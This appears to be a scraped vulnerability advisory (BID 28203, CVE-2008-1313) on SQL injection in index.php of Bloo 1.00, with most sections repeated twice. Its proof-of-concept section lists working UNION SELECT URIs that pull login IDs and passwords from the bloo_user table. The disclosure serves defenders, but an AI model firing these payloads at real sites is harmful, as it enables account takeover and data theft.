Bloo 'index.php' Multiple SQL Injection Vulnerabilities
BID:28203
Info
Bloo 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 28203 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1313 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 11 2008 12:00AM |
| Updated: | Apr 16 2015 06:05PM |
| Credit: | MhZ91 is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Bloo Bloo 1.00 |
| Not Vulnerable: | |
Discussion
Bloo 'index.php' Multiple SQL Injection Vulnerabilities
Bloo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bloo 1.0 is vulnerable; other versions may also be affected.
Bloo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bloo 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Bloo 'index.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
Solution / Fix
Bloo 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].